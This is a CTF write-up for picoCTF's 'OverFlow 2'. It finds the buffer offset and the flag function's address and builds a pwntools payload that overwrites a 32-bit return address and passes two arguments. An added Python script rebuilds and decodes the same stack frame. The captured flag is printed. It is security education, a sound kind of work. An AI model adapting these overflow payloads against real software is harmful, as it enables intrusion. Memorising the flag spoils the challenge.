OverFlow 2
Now try overwriting arguments. Can you get the flag from this program? You can find it in /problems/overflow-2_2_47d6bbdfb1ccd0d65a76e6cbe0935b0f on the shell server. Source.
1. Find the offset/padding
   1. You can use the method described in rop64 with `cyclic` and `cyclic_find`, or you can use the following:
   2.
   3. Run `aaaa`
   4. Run `pdf @ sym.vuln` to get `var int local_b8h @ ebp-0xb8`
   5. The `0xb8` is the buffer location, so 4 more bytes are needed to get past the saved `ebp` register
   6. So the offset is `0xb8+4`
2. Run `readelf -s vuln` to get the address of `flag`: `0x080485e6`
3. We can use `p32` from pwntools to convert the hex addresses to little endian.
4. We need to pad out the second return address with `'a'*4`, so that goes next in the payload.
5. Now we can add the two function arguments in little endian using `p32`.
6. Payload complete:

```
python2 -c "from pwn import *; print 'a'*(0xb8+4)+p32(0x080485e6)+'a'*4+p32(0xDEADBEEF)+p32(0xC0DED00D)" | ./vuln
```

`picoCTF{arg5_and_r3turn5ce5cf61a}`
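As an added example that is not part of the original writeup, the same frame is built with `struct` instead of pwntools and then decoded back into stack slots, which shows why the `'a'*4` filler is needed: `flag` is entered by `ret`, not `call`, so nothing pushes a return address for it and the arguments sit one slot further up. The `0xb8`, `0x080485e6` and argument values are taken from the steps above; `build_payload` and `frame_layout` are names chosen here.

```python
import struct

# Values taken from the writeup above (not read from a live binary).
BUF_OFFSET = 0xb8        # `var int local_b8h @ ebp-0xb8` from `pdf @ sym.vuln`
SAVED_EBP = 4            # 32-bit saved frame pointer between the buffer and the return address
FLAG_ADDR = 0x080485e6   # address of `flag` from `readelf -s vuln`
ARGS = (0xDEADBEEF, 0xC0DED00D)


def p32(value):
    """Pack a 32-bit value little-endian (same result as pwntools' p32)."""
    return struct.pack("<I", value)


def u32(data):
    return struct.unpack("<I", data)[0]


def build_payload(offset=BUF_OFFSET + SAVED_EBP, target=FLAG_ADDR, args=ARGS):
    """Padding, the overwritten return address, then the frame `flag` expects.

    Because `flag` is reached by `ret` rather than `call`, no return address is
    pushed for it, so four filler bytes occupy the slot it would return to and
    the cdecl arguments land at [esp+4] and [esp+8] when `flag` starts.
    """
    return b"a" * offset + p32(target) + b"a" * 4 + b"".join(p32(a) for a in args)


def frame_layout(payload, offset=BUF_OFFSET + SAVED_EBP, nargs=len(ARGS)):
    """Decode a payload into (byte offset from buffer start, value) per stack slot."""
    slots = {}
    pos = offset
    slots["saved_eip"] = (pos, u32(payload[pos:pos + 4]))
    pos += 4
    slots["callee_return"] = (pos, payload[pos:pos + 4])
    pos += 4
    for i in range(nargs):
        slots["arg%d" % (i + 1)] = (pos, u32(payload[pos:pos + 4]))
        pos += 4
    return slots


if __name__ == "__main__":
    payload = build_payload()
    for name, (pos, value) in frame_layout(payload).items():
        shown = hex(value) if isinstance(value, int) else value
        print("buffer+0x%02x  %-14s %s" % (pos, name, shown))
```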